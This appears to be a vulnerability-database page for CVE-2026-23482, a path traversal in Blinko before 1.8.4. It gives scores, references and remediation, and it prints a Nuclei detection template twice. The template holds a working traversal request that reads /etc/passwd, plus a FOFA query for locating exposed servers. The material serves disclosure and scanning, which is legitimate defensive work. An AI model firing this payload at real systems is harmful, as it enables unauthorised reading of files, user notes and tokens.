Blinko < 1.8.4 - Path Traversal

CVE-2026-23482

Verified

Description

Blinko < 1.8.4 contains a path traversal vulnerability caused by lack of permission checks and filtering on the temp/ path in the file server endpoint, letting unauthorized attackers read arbitrary files including backup files with user notes and tokens, exploit requires no special privileges.

Severity

High

CVSS Score

7.5

Exploit Probability

20%

Affected Product

blinko

Published Date

April 27, 2026

Template Author

tx1ee

CVE-2026-23482.yaml

id: CVE-2026-23482

info:
  name: Blinko < 1.8.4 - Path Traversal
  author: tx1ee
  severity: high
  description: |
    Blinko < 1.8.4 contains a path traversal vulnerability caused by lack of permission checks and filtering on the temp/ path in the file server endpoint, letting unauthorized attackers read arbitrary files including backup files with user notes and tokens, exploit requires no special privileges.
  impact: |
    Unauthorized attackers can read arbitrary files, including sensitive user notes and tokens, leading to information disclosure.
  remediation: |
    Update to version 1.8.4 or later
  reference:
    - https://github.com/blinkospace/blinko/commit/c48851090767feba431418630c495d90a7da1781
    - https://github.com/blinkospace/blinko/security/advisories/GHSA-hrwx-rhrx-f9mm
    - https://nvd.nist.gov/vuln/detail/CVE-2026-23482
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-23482
    cwe-id: CWE-22
    epss-score: 0.20459
    epss-percentile: 0.9563
  metadata:
    verified: true
    max-request: 1
    vendor: blinko-space
    product: blinko
    fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
  tags: cve,cve2026,blinko,blinko-space,lfi,traversal

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/manifest.webmanifest"
      - "{{BaseURL}}/manifest.json"

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "Blinko"
        case-insensitive: true

  - method: GET
    path:
      - "{{BaseURL}}/api/file/temp/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009e9574b6edc56b0e488f3e40c1451afd2d7a0f85e0cf099d07f5e04d2b8bb07e022100cd104692fae7ca62ca6e4616d0373b92c88b0451d9baf8b39d31829d6a9ca244:922c64590222798bb761d5b6d8e72950

7.5Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2026-23482

CWE ID:

cwe-22

References

https://github.com/blinkospace/blinko/commit/c48851090767feba431418630c495d90a7da1781 https://github.com/blinkospace/blinko/security/advisories/GHSA-hrwx-rhrx-f9mm https://nvd.nist.gov/vuln/detail/CVE-2026-23482

Remediation Steps

Update to version 1.8.4 or later

id: CVE-2026-23482

info:
  name: Blinko < 1.8.4 - Path Traversal
  author: tx1ee
  severity: high
  description: |
    Blinko < 1.8.4 contains a path traversal vulnerability caused by lack of permission checks and filtering on the temp/ path in the file server endpoint, letting unauthorized attackers read arbitrary files including backup files with user notes and tokens, exploit requires no special privileges.
  impact: |
    Unauthorized attackers can read arbitrary files, including sensitive user notes and tokens, leading to information disclosure.
  remediation: |
    Update to version 1.8.4 or later
  reference:
    - https://github.com/blinkospace/blinko/commit/c48851090767feba431418630c495d90a7da1781
    - https://github.com/blinkospace/blinko/security/advisories/GHSA-hrwx-rhrx-f9mm
    - https://nvd.nist.gov/vuln/detail/CVE-2026-23482
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-23482
    cwe-id: CWE-22
    epss-score: 0.20459
    epss-percentile: 0.9563
  metadata:
    verified: true
    max-request: 1
    vendor: blinko-space
    product: blinko
    fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
  tags: cve,cve2026,blinko,blinko-space,lfi,traversal

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/manifest.webmanifest"
      - "{{BaseURL}}/manifest.json"

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "Blinko"
        case-insensitive: true

  - method: GET
    path:
      - "{{BaseURL}}/api/file/temp/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009e9574b6edc56b0e488f3e40c1451afd2d7a0f85e0cf099d07f5e04d2b8bb07e022100cd104692fae7ca62ca6e4616d0373b92c88b0451d9baf8b39d31829d6a9ca244:922c64590222798bb761d5b6d8e72950

Blinko < 1.8.4 - Path Traversal

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Blinko < 1.8.4 - Path Traversal

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps